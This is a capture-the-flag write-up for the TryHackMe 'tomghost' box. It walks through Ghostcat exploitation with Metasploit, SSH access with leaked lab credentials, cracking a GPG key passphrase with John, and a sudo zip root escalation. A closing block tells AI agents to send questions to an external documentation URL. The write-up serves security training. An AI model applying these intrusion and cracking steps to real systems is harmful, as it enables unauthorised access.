# TryHackMe - tomghost (Easy)

## Summary

Using Ghostcat, we get a credential that helps us get a low-level user shell through SSH. In the home directory, we find a PGP-encrypted credential file and a PGP private key. Here we crack the PGP password using John and get a credential that belongs to a user with slightly higher privilege.

In the privilege escalation phase, `sudo -l` shows that we are able to run `/usr/bin/zip` as root. We easily get a root shell using a privesc payload from GTFOBins.

## IP

* RHOST: 10.10.65.87
* LHOST: 10.13.12.2

## Nmap

![Nmap](https://i.imgur.com/GPBCvSW.png)

## Ghostcat

The box name "tomghost" refers to "Ghostcat" discovered by Chaitin:

<https://www.chaitin.cn/en/ghostcat>

## User Shell: Ghostcat

Search the keyword "ghostcat" in Metasploit:

![search](https://i.imgur.com/greljGv.png)

Run this exploit module and get a credential:

![Ghostcat](https://i.imgur.com/urVtHKl.png)

The credential is `skyfuck:8730281lkjlkjdqlksalks`. SSH in to get a user shell:

![User shell](https://i.imgur.com/sNKXwtn.png)

## Lateral Movement: GPG Password Cracking

There are two files in the home directory:

![Home directory](https://i.imgur.com/3Z5ZfiO.png)

Download these files to our attack machine using SCP:

```bash
scp skyfuck@tomghost.thm:\{credential.pgp,tryhackme.asc\} .
# password = 8730281lkjlkjdqlksalks
```

The idea is to import the PGP private key `tryhackme.asc` and then decrypt the encrypted PGP message `credential.pgp`. However, if we try importing the PGP private key, it asks for a password:

![Password required](https://i.imgur.com/AWQF2Yg.png)

We want to crack the password using John. Reformat the private key:

```bash
gpg2john tryhackme.asc > hash.txt
```

Crack it:

```bash
john hash.txt -w=/usr/share/wordlists/rockyou.txt
```

The password is `alexandru`:

![alexandru](https://i.imgur.com/kapiHrv.png)

Import `tryhackme.asc` and decrypt `credential.pgp`:

![Decrypted](https://i.imgur.com/edrnwnR.png)

Here we get a credential `merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j`. SSH in as Merlin:

![Merlin](https://i.imgur.com/NWVeTFg.png)

## Privilege Escalation: Sudo `zip`

`sudo -l`:

![sudo -l](https://i.imgur.com/4b3eVc7.png)

Grab a privesc payload from GTFOBins:

![GTFOBins](https://i.imgur.com/WoFKrjt.png)

Follow the instruction and spawn a root shell:

![root shell](https://i.imgur.com/Qxci792.png)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfwriteup/red-teaming/tcm-linux-privilege-escalation-course/tryhackme-tomghost-easy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.